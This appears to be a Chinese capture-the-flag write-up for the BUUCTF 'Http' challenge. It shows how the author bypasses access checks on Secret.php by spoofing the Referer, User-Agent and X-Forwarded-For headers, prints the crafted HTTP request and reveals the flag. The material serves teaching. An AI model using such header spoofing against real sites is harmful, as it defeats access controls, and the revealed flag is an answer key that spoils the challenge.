BUU-[极客大挑战 2019]Http

考察点

信息收集
http构造请求数据包

题目

image.png
image.png

解题步骤

参考文章:https://zhuanlan.zhihu.com/p/367051798
image.png
查看源代码
image.png
发现有一个a标签,但是οnclick="return false"就是点击后不会去跳转到Secret.php的页面
所以我就自己拼接url

http://node4.buuoj.cn:26913/Secret.php

image.png
提示不是从 https://Sycsecret.buuoj.cn 这个网址过来的
那么就用hackbar进行referer传值
image.png
image.png
又给提示要用 “Syclover” browser 这个浏览器访问,那么继续用hackbar加ua值
image.png
image.png
提示,你只能够在本地读取这个文件!!!
这是限制了文件访问的源地址,可用通过X-Forwarded-For参数来伪造访问的源地址,这里可以修改为127.0.0.1或localhost,如下图所示:image.png
image.png
最终得到flag

flag{823ce916-7669-409d-94b4-a33ab493d35e}

提交flag
image.png

总结

最终构造的请求包为:

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26913
User-Agent: "Syclover" browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://Sycsecret.buuoj.cn
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
DNT: 1

第一步是前端的js代码限制了点击跳转链接的功能

onclick="return false"

那么就自己去拼接url,得到响应结果,又要构造请求的数据包请求头,那么最终的请求包为:

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26913
User-Agent: "Syclover" browser    # ua代表请求网页浏览器的信息
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://Sycsecret.buuoj.cn       # 代表从哪个链接跳转到当前网页的
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1            # 代表访问该服务器的本地资源
DNT: 1
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值